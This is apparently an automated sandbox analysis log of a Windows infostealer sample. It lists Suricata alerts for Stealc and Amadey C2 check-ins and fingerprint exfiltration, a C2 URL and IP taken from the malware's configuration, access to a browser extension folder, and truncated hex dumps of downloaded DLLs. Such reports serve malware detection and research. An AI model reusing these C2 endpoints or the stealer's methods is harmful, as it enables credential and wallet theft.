Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49806 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a0969106aa.exe, 0000001C.00000003.2941381485.0000000004750000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001C.00000002.3075139523.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001E.00000003.3098995666.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001E.00000002.3139269920.0000000000D42000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000003.3230672067.0000000005370000.00000004.00001000.00020000.00000000.sdmp, a0969106aa.exe, 0000001F.00000002.3270869703.0000000000D42000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:54752 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:54766
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54783 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54787 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:54786 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:54793 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:54794 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:54801 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.5:54502 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 